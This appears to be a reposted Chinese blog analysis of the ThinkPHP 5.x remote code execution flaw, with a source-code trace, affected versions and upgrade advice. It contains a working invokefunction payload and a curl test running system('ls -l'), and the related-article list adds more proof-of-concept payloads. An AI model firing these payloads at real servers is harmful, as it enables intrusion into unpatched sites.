thinkphp v5.0.11漏洞_ThinkPHP 5.x 远程代码getshell漏洞实战分析

最新推荐文章于 2021-01-16 22:38:37 发布
最新推荐文章于 2021-01-16 22:38:37 发布
阅读量351 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: thinkphp v5.0.11漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39700394/article/details/111775884
本文深入分析了ThinkPHP 5.0.11版本中的一个远程代码执行漏洞,该漏洞源于框架对控制器名的不足检测。通过构造特定请求,攻击者可以利用此漏洞执行系统命令。文章详细解释了漏洞触发过程,并提供了漏洞测试结果。建议受影响的用户尽快升级到ThinkPHP 5.0.23或5.1.31以消除风险。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

ThinkPHP 简介

ThinkPHP 是一个免费开源的,快速、简单的面向对象的轻量级PHP开发框架,因为其易用性、扩展性,已经成长为国内颇具影响力的WEB应用开发框架

漏洞解析

漏洞引发的原因是框架对控制器名没有进行足够的检测,现拉取ThinkPHP v5.0.22 来进行测试请求路由

=> http://127.0.0.1/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l

系统解析为

=> 模块:index

=> 控制器:\think\app

=> 方法:invokefunction

=> 参数列表:

=> function=call_user_func_array

=> vars[0]=system

=> vars[1][]=ls%20-l

跟踪到路由解析代码 \thinkphp\library\think\App.php/**

* 执行模块

* @access public

* @param array $result  模块/控制器/操作

* @param array $config  配置参数

* @param bool  $convert 是否自动转换控制器和操作名

* @return mixed

* @throws HttpException

*/

public static function module($result, $config, $convert = null)

{        // ======================================================

// 未进行过滤直接以 / 分解来进行解析

// ======================================================

if (is_string($result)) {

$result = explode('/', $result);

}

...        // ======================================================

// 未进行过滤直接赋值为 $result[1] 即 \think\app 并进行实例化

// ======================================================

$instance = Loader::controller(

$controller,                      // \think\app

$config['url_controller_layer'],

$config['controller_suffix'],

$config['empty_controller']

);

...        // =========================================

// 传递 $result[2] 即 invokefunction 方法

// is_callable([$instance, "invokefunction"]

// =========================================

if (is_callable([$instance, $action])) {

// 执行操作方法

$call = [$instance, $action];            // 严格获取当前操作方法名

$reflect    = new \ReflectionMethod($instance, $action);

$methodName = $reflect->getName();

$suffix     = $config['action_suffix'];

$actionName = $suffix ? substr($methodName, 0, -strlen($suffix)) : $methodName;

$request->action($actionName);

...        return self::invokeMethod($call, $vars);

...    /**

* 调用反射执行类的方法 支持参数绑定

* @access public

* @param string|array $method 方法

* @param array        $vars   变量

* @return mixed

*/

public static function invokeMethod($method, $vars = [])

{        if (is_array($method)) {

$class   = is_object($method[0]) ? $method[0] : self::invokeClass($method[0]);

$reflect = new \ReflectionMethod($class, $method[1]);

} else {            // 静态方法

$reflect = new \ReflectionMethod($method);

}

$args = self::bindParams($reflect, $vars);        // ===============================================

// 传递uri参数

// var_dump($args);

// --------------------------

// array(2) {

//   [0]=>

//   string(20) "call_user_func_array"

//   [1]=>

//   array(2) {

//     [0]=>

//     string(6) "system"

//     [1]=>

//     array(1) {

//       [0]=>

//       string(5) "ls -l"

//     }

//   }

// }

// ===============================================

self::$debug && Log::record('[ RUN ] ' . $reflect->class . '->' . $reflect->name . '[ ' . $reflect->getFileName() . ' ]', 'info');        // =======================================================

// 即通过 invokeFunction 传递系统调用给 call_user_func_array

// 从而调用 system("ls -l")

// =======================================================

return $reflect->invokeArgs(isset($class) ? $class : null, $args);

}

...    /**

* 执行函数或者闭包方法 支持参数调用

* @access public

* @param string|array|\Closure $function 函数或者闭包

* @param array                 $vars     变量

* @return mixed

*/

public static function invokeFunction($function, $vars = [])

{

$reflect = new \ReflectionFunction($function);

$args    = self::bindParams($reflect, $vars);        // 记录执行信息

self::$debug && Log::record('[ RUN ] ' . $reflect->__toString(), 'info');        return $reflect->invokeArgs($args);

}漏洞测试结果# curl "http://127.0.0.1/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l"total 13-rw-r--r-- 1 pc-user 197121 850 Sep  7 21:33 favicon.ico

-rw-r--r-- 1 pc-user 197121 766 Sep  7 21:33 index.php

-rw-r--r-- 1 pc-user 197121  24 Sep  7 21:33 robots.txt

-rw-r--r-- 1 pc-user 197121 840 Sep  7 21:33 router.php

drwxr-xr-x 1 pc-user 197121   0 Dec 26 22:18 static

受影响版本范围

ThinkPHP 5.0.x < 5.0.23

ThinkPHP 5.1.x < 5.1.31

大家看一下相关链接中github版本列表,参考github release列表的更新内容,选择对自己升级影响最小的,最好的话就是直接升级到最新版本,要想不受漏洞影响,至少应该升级为

ThinkPHP 5.0.23

ThinkPHP 5.1.31composer require topthink/framework=v5.0.23composer require topthink/framework=v5.1.31升级后确认版本已更新# composer show topthink/frameworkname     : topthink/framework

descrip. : the new thinkphp framework

keywords : framework, orm, thinkphp

versions : * v5.0.23type     : think-framework

...

作者:HBLong

链接:https://www.jianshu.com/p/4214cc0443bc

rangechecks 检测代码检测到超出范围的数组访问。_Thinkphp 5.0远程代码执行漏洞
weixin_39956350的博客
12-16 801
0x01 简叙本次版本更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5.05.1版本,推荐尽快更新到最新版本。这部分是官网的漏洞通告,官方最开始的补丁是在library/think/route/dispatch/Module.php中添加。但是随机在第二天的5.1.31版本中将这部分的控制移动到...
thinkphp v5.0.11漏洞_ThinkPHP 5.0.x-5.0.23、5.1.x、5.2.x 全版本远程代码执行漏洞分析
weixin_39522103的博客
12-21 570
阅读:10,1441月11日,ThinkPHP官方发布新版本5.0.24,在1月14日和15日又接连发布两个更新,这三次更新都修复了一个安全问题,该问题可能导致远程代码执行 ,这是ThinkPHP近期的第二个高危漏洞,两个漏洞均是无需登录即可远程触发,危害极大。0x01 概述1月11日,ThinkPHP官方发布新版本5.0.24,在1月14日和15日又接连发布两个更新,这三次更新都修复了一个安全问...
ThinkPHP v5.x命令执行利用工具(可getshell
11-19
ThinkPHP v5.x命令执行利用工具(可getshell
thinkphp v5.0.11漏洞_ThinkPHP 5.0再曝远程代码执行漏洞
weixin_28931507的博客
12-30 586
https://nosec.org/home/detail/2163.html2019年1月11日,白帽汇安全研究院发现thinkphp官网发布了安全更新,修复了一个远程代码执行漏洞。主要影响的版本为5.0.0~5.0.23版本。此次爆出漏洞ThinkPHP 5.x版本是官方于2015年发布的新一代框架,其中5.0版本于2016年的9月份布。在不久之前,ThinkPHP 5.x版本就曝出远程代码...
thinkphp v5.0.11漏洞_ThinkPHP 5.0.x 版本远程代码执行漏洞分析
weixin_30490029的博客
12-30 572
0x01 概述1月11日, ThinkPHP 官方发布新版本5.0.24,修复了一个安全问题,该问题可能导致 GetShell ,这是 ThinkPHP 近期的第二个高危漏洞,两个漏洞均是无需登录即可远程触发,危害极大。0x02 影响版本5.0.x ~ 5.0.230x03 环境搭建选择 5.0.22 版本进行复现分析0x04 漏洞分析我们知道可以通过 http://127.0.0.1/publi...
thinkphp v5.0.11漏洞_ThinkPHP 5.0命令执行漏洞分析及复现
weixin_39609953的博客
12-21 515
*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。*本文作者:小纨绔,本文属 FreeBuf 原创奖励计划,未经许可禁止转载。ThinkPHP 5.0 版本是一个颠覆和重构版本,也是ThinkPHP 十周年献礼版本,基于 PHP5.4 设计(完美支持 PHP7 ),采用全新的架构思想,引入了很多的 PHP 新特性,优化了核心,减少了...
Thinkphp 5.0.x_5.1.x 变量覆盖 RCE 漏洞分析1
08-03
### ThinkPHP 5.0.x/5.1.x 变量覆盖远程代码执行(RCE)漏洞分析 #### 漏洞概述 ThinkPHP 5.0.x 和 5.1.x 版本中存在一个变量覆盖导致的远程代码执行(RCE)漏洞。该漏洞利用者可以通过对特定HTTP请求参数的精心...
ThinkPHP v5.0.11 完整版
12-17
《深入理解ThinkPHP v5.0.11:构建高效Web应用的基石》 ThinkPHP,作为国内广泛应用的PHP开发框架,以其简洁、高效的特性深受开发者喜爱。版本5.0.11是其发展中的一个重要里程碑,它在前代的基础上进一步优化了性能...
thinkphp漏洞_ThinkPHP5.0 远程代码执行漏洞
weixin_39634579的博客
11-25 288
漏洞介绍ThinkPHP是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源MVC框架,简单来说就是Thinkphp处理请求的关键类为Request(thinkphp/library/think/Request.php这个类可以处理http请求设置但此框架支持表单伪装变量,通过伪装变量实现任意函数的调用影响版本5.0全版本复现环境Vulhub漏洞靶场vulhub-master/thinkphp...
thinkphp v5.0.11漏洞_ThinkPHP(5.1.x ~ 5.1.31 5.0.x ~ 5.0.23)GetShell漏洞
weixin_39657444的博客
12-30 570
12月9日,thinkPHP5.*发布了安全更新,这次更新修复了一处严重级别的漏洞,该漏洞可导致(php/系统)代码执行,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞。此前没有研究过thinkPHP框架,这次借这个漏洞学习一下。#0x01补丁比对比较5.0.22和5.0.23的差异,关键点在app的module方法。5.0.22://获取控制器名...
thinkphp v5.0.11漏洞_这个漏洞,我劝你耗子尾汁
weixin_28850145的博客
12-21 578
亲爱的,关注我吧12/16本文字数2704来和我一起阅读吧前言最近在某论坛上看到一篇分析74cms存在模板解析漏洞的文章,74cms使用了tp3的框架,然后自己对tp框架的模板解析渲染也不是很熟,就想着学习一下这个漏洞,顺便熟悉一下tp3的模板解析。说干就干,先挑一个软一点的74cms捏一下,cms版本:v6.0.20漏洞分析对一个已知漏洞进行分析比较喜欢采用溯源的方式进行,首先已知漏...
thinkphp5调用shell脚本_【漏洞复现】ThinkPHP5 5.x 远程命令执行(getshell)
weixin_39906358的博客
01-16 391
0x00复现环境0x01步骤0x02漏洞原理分析关键代码在修复之前程序未对控制器进行过滤,导致攻 击 者可以通过引入 \ 符号来调用任意类方法。$this -> app -> controller 方法来实例化控制器,然后调用实例中的方法。follow the controller method:thinkphp/library/think/App.php通过parseModuleAn...
thinkphp 一个文件怎么调用另一个文件中的define()_Thinkphp 反序列化利用链深入分析...
weixin_39605521的博客
12-10 194
作者:Ethan@知道创宇404实验室时间:2019年9月21日原文链接:https://paper.seebug.org/1040/前言今年7月份,ThinkPHP 5.1.x爆出来了一个反序列化漏洞。之前没有分析过关于ThinkPHP的反序列化漏洞。今天就探讨一下ThinkPHP的反序列化问题!环境搭建Thinkphp 5.1.35php 7.0.12漏洞挖掘思路在刚接触反序列化漏洞的时候,更...
thinkphp v5.0.11漏洞_ThinkCMFX 漏洞分析集合
weixin_35890416的博客
12-10 765
ThinkCMF是一款基于ThinkPHP+MySQL开发的中文内容管理框架。ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需求以应用的形式进行扩展。每个应用都能独立的完成自己的任务,也可通过系统调用其他应用进行协同工作。在这种运行机制下,开发商场应用的用户无需关心开发SNS应用时如何工作的,但他们之间又可通过系统本身进行协调,大大的降低了开发成本...
thinkphp v5.0.11漏洞_thinkphp 5.0 代码执行漏洞
weixin_39657662的博客
12-21 174
docker-compose -f /home/root/compose.yml up然后访问127.0.0.1:8080POC:1、?s=index/\think\Request/input&filter=phpinfo&data=12、?s=index/\think\Request/input&filter=system&data=id3、?s=index/\t...
thinkphp5+远程代码执行_ThinkPHP5 5.0.23 远程代码执行漏洞
weixin_39618169的博客
11-25 236
漏洞描述ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞漏洞环境使用vulhub的环境进行搭建docker-compose up -dhttps://github.com/vulhub/vulhub漏洞复现抓包成功执行命令数据包"...
thinkphp v5.0.11漏洞_漏洞预警通报【高危】
weixin_42299679的博客
12-21 1049
1漏洞标题ThinkPHP5远程代码执行漏洞2漏洞描述ThinkPHP 是一个快速、兼容而且简单的轻量级国产 PHP 开发框架。ThinkPHP 从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,也注重易用性。并且拥有众多原创功能和特性,在社区团队的积极参与下,在易用性、扩展性和性能方面不断优化和改进。近日,ThinkPHP 官方发布了安全更新,其中修复了存在...
ThinkPHP V5.0.5漏洞_ThinkPHP5远程代码执行漏洞动态分析
weixin_39756192的博客
11-19 1285
ThinkPHP是为了简化企业级应用开发和敏捷WEB应用开发而诞生的,在保持出色的性能和至简代码的同时,也注重易用性。但是简洁易操作也会出现漏洞,之前ThinkPHP官方修复了一个严重的远程代码执行漏洞。这个漏洞的主要原因是由于框架对控制器名没有进行足够的校验导致在没有开启强制路由的情况下可以构造恶意语句执行远程命令,受影响的版本包括5.05.1版本。那么今天i春秋用动态分析法来介绍远...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值